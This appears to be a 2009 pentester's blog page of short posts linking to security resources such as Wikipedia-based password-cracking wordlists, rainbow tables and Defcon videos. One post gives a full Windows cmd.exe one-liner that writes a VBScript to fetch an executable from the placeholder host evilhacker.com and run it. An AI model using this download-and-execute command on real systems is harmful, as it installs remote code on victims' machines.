Wednesday, March 25, 2009

Cracking passwords with Wikipedia

Sebastien Raveau shares his secret with cracking passwords using not the dictionary, but Wikipeda. Combine this with the wordlist based rainbow tables and you have quite the effective cracking machine.
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc

You can find Sebastien on Twitter: @sraveau



Saturday, March 21, 2009

How to present while people are twittering

Not technical but a very good article for presenters in this twitter/socmed age:
http://pistachioconsulting.com/twitter-presentations/

And we have Holograms

Yes, I know this isn't technically a hologram, but it's damn cool:
http://gl.ict.usc.edu/Research/3DDisplay/

VMWorld Europe 2009 Videos

Not sure if I posted this already or not, but this guy has some awesome other videos too:
http://www.boche.net/blog/index.php/2009/03/01/vmworld-europe-2009-videos/

10 Papers Every Programmer Should Read

.. at least twice... I have read 6 of them and I certainly agree. I'll push the rest to my Kindle once it arrives.

http://blog.objectmentor.com/articles/2009/02/26/10-papers-every-programmer-should-read-at-least-twice

TuxTraining

Free online linux crash courses, blog post style:
http://tuxtraining.com/

Saturday, March 14, 2009

Friday, March 13, 2009

Social Engineering Webcast

Chris Nickerson and Mike Murray put on a good webinar about Social Engineering. Check out the recording and slide deck here:
http://www.ethicalhacker.net/content/view/242/2/

Wednesday, March 11, 2009

Shell Greed

On twitter I post a long shell command that would boot/kick off a system every other user. @marcinw made it shorter and I submitted it to Shell-fu.org. Today they posted it live. Here is the link:
http://www.shell-fu.org/lister.php?id=558

Tuesday, March 10, 2009

HTML to PDF

The site just just as it says. Has a ton of applications, but the one I'm interested in at the moment, is using to to throw things on my Kindle for later reading.
http://www.html-pdf-converter.com/

Monday, March 9, 2009

Public Rainbow-Tables

Oldie but a goodie that you just might not know about:
http://www.plain-text.info


Saturday, March 7, 2009

One LONG line wget for windows

"cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\getnrun.vbs & echo Dim BinaryStream >> C:\windows\getnrun.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\getnrun.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\getnrun.vbs & echo BinaryStream.Open >> C:\windows\getnrun.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\getnrun.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\getnrun.vbs & echo Function BinaryGetURL(URL) >> C:\windows\getnrun.vbs & echo Dim Http >> C:\windows\getnrun.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs & echo Http.Open "GET", URL, False >> C:\windows\getnrun.vbs & echo Http.Send >> C:\windows\getnrun.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\getnrun.vbs & echo End Function >> C:\windows\getnrun.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\getnrun.vbs & echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs & start C:\windows\getnrun.vbs http://evilhacker.com/update.exe C:\update.exe"

Friday, March 6, 2009

Fact/Fiction Book by Jayson Street

Check out the site for some sneak peeks into the Fact/Fiction book coming out BH USA / DefCon timeframe!
The Story is F1ct10n The threats are real.


Thursday, March 5, 2009

Developer Cheet Sheets galore

A bunch of programming cheet sheets. Why post it here? Because those SQL, BATCH, and Bash cheet sheets come in mighty handy during pentests:
http://www.fuzzyopinions.com/article/technology/the-developer-cheat-sheet-compilation

Defcon 16 Videos and Audio

All of the video and audio uploads were completed:
https://media.defcon.org/

Flash and Javascript Evaluater

This a pretty awesome service, still in alpha so play nice:
http://wepawet.iseclab.org/index.php

They have examples that you can check out if you don't have anything on hand to throw at it.